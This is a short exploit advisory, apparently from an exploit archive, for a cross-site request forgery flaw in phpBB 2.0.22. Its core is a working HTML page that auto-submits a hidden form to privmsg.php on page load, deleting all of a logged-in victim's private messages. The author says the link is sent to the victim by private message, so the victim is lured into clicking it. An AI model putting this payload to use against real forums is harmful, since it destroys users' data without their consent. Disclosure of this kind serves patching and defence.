################################################################ phpBB 2.0.22 Remote PM Delete XSRF Vulnerability by NBBN Type: Cross-Site Request Forgery Founded: December 2007 ################################################################ An attacker can send a link via pm to a site with the follow html code to a victim and all victim's pm's are going to be deleted when he click the link. ######Code########################################################## <html> <head> </head> <body onLoad=javascript:document.xsrf.submit()> <form action="http://[site]/phpBB2/privmsg.php?folder=inbox"; method="post" name="xsrf"> <input type="hidden" name="mode" value="" /> <input type="hidden" name="deleteall" value="true" /> <input type="hidden" name="confirm" value="Yes"> </body> </html> ##################################################################### ######Vuln Versions:##################### I've tested it only on 2.0.22 but I think that all versions of 2 are vuln. (Sorry my bad english :-) )
